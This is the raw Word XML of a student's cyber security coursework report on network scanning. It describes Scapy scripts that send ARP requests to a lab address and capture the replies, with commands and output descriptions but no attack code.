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B3385" w14:textId="395CF72C" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C456CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>FORMAN CHRISTIAN COLLEGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05446CE8" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00B13C27" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13C27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>(A CHARTERED UNIVERSITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F171E0" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AA67E2" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00556CC8" w:rsidRDefault="00180A80" w:rsidP="00180A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068EE29" wp14:editId="6EFEA06A">
            <wp:extent cx="2338145" cy="2016650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1148418425" name="Picture 1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18425" name="Picture 1" descr="A blue logo with a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20" cy="20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03D8" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180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05EE5" w14:textId="6BA2EB6A" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180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E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CSC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95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636E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC54079" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180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E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LL </w:t>
      </w:r>
      <w:r w:rsidRPr="001636E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40472E29" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180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A2D95" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A8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80A80">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CYBER SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CD3F3" w14:textId="6567C053" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180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14:paraId="3F2BC1AE" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00D369B8" w:rsidRDefault="00180A80" w:rsidP="00180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130F8" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A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EAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hafsah Shahbaz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C20AB" w14:textId="05DA0DD4" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A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5EAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>251684784</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694D725" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4678F2" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72646B03" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EE0881" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A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867FF1" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A8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3A690E" w14:textId="7C652C7F" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr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820F6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20F6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> October 6, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A75A1F" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633E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FC71D60" w14:textId="24393EAA" w:rsidR="00633EB0" w:rsidRPr="00633EB0" w:rsidRDefault="00633EB0" w:rsidP="00633EB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1 --- Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9AB65" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00180A80" w:rsidP="00633EB0">
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">This report outlines the process of network scanning using Python scripts. The primary library used is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">, a powerful tool for network packet manipulation and analysis. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C4E16" w14:textId="68938747" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00633EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A80">
        <w:t>: For handling command-line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4BCE9" w14:textId="6A57FBBA" w:rsidR="003B3BB1" w:rsidRPr="003B3BB1" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30344C" w14:textId="77777777" w:rsidR="003B3BB1" w:rsidRPr="003B3BB1" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ether</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>: Used to create Ethernet frames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275338FA" w14:textId="77777777" w:rsidR="003B3BB1" w:rsidRPr="003B3BB1" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>: Used to craft ARP packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBDA1EB" w14:textId="77777777" w:rsidR="003B3BB1" w:rsidRPr="003B3BB1" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>srp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>: Sends and receives packets at the data link layer (e.g., Ethernet frames).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF978B6" w14:textId="77777777" w:rsidR="003B3BB1" w:rsidRPr="003B3BB1" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3BB1">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>Scapy's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:t xml:space="preserve"> configuration manager for verbosity and other settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B11A20C" w14:textId="49CEC403" w:rsidR="003B3BB1" w:rsidRPr="003B3BB1" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>: Provides access to command-line arguments (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35448830" w14:textId="20B7677F" w:rsidR="003B3BB1" w:rsidRPr="00180A80" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3BB1">
        <w:t>: Used to record and format the current time during execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC747D" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00633EB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A80">
        <w:t>: To track the scanning start time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECDB8B9" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00633EB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A80">
        <w:t>: Used for banner grabbing and service detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35347ED4" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00633EB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A80">
        <w:t>: Provides randomness if required in packet creation (not used in this task).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7E95E0" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80"/>
    <w:p w14:paraId="557AEDC9" w14:textId="3430A955" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="003B3BB1" w:rsidP="00633EB0">
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code Snippet 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B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3B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Display Current Time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00180A80" w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(scan1.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68012BEE" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Command Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFF4997" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> python scan1.py eth0 10.0.2.5 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6F08F" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Code Explanation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38377B76" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">The script uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve"> to generate and send ARP packets to determine the MAC address of the specified IP address (10.0.2.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43882BB8" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>The ARP request is crafted with the specified target IP and the interface (eth0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02011E" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>The output displays details of the ARP packet, including source MAC address, destination MAC address (broadcast), and the ARP "who-has" query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F1BC7C" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Output Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D899B1" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Displays details of the ARP packet sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FCEA21" w14:textId="2C4070D7" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="003B3BB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>The MAC address associated with the target IP address is shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74402F49" w14:textId="76487AAE" w:rsidR="00DB4B7F" w:rsidRDefault="00D4215D" w:rsidP="003B3BB1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4215D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BFA1133" wp14:editId="3DE0349E">
            <wp:extent cx="4846320" cy="1320829"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180464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46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240" cy="13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040B" w14:textId="77777777" w:rsidR="00C06EF5" w:rsidRDefault="00C06EF5"/>
    <w:p w14:paraId="39ECD053" w14:textId="371FE1BC" w:rsidR="00180A80" w:rsidRDefault="003B3BB1" w:rsidP="003B3BB1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Code Snippet </w:t>
      </w:r>
      <w:r w:rsidR="00180A80" w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyzing Network Packets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00180A80" w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(scan2.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9DB18" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRPr="00180A80" w:rsidRDefault="00633EB0" w:rsidP="003B3BB1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D00D99E" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Command Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A95798" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> python scan2.py eth0 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9229D9" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Code Explanation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C5C8D" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">This script listens </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve"> packets on the specified interface (eth0) and captures responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43574438" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>An ARP request is sent to verify communication with the target IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E0FEA0" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Captured packets are dissected to display details about Ethernet and ARP layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394F148" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Output Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F910A1" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Shows Ethernet and ARP headers for the captured packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F319D0" w14:textId="6A4EC07A" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="004D7189">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Confirms the ARP query was sent and received successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A9544" w14:textId="3F463AEF" w:rsidR="00C06EF5" w:rsidRDefault="00C06EF5" w:rsidP="004D7189">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C06EF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044FAD28" wp14:editId="0C36564C">
            <wp:extent cx="5064872" cy="3933092"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="95974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412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364" cy="39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B8FC" w14:textId="77777777" w:rsidR="005D46D3" w:rsidRDefault="005D46D3"/>
    <w:p w14:paraId="2BEF435D" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0">
      <w:pPr>
        <w:rPr>
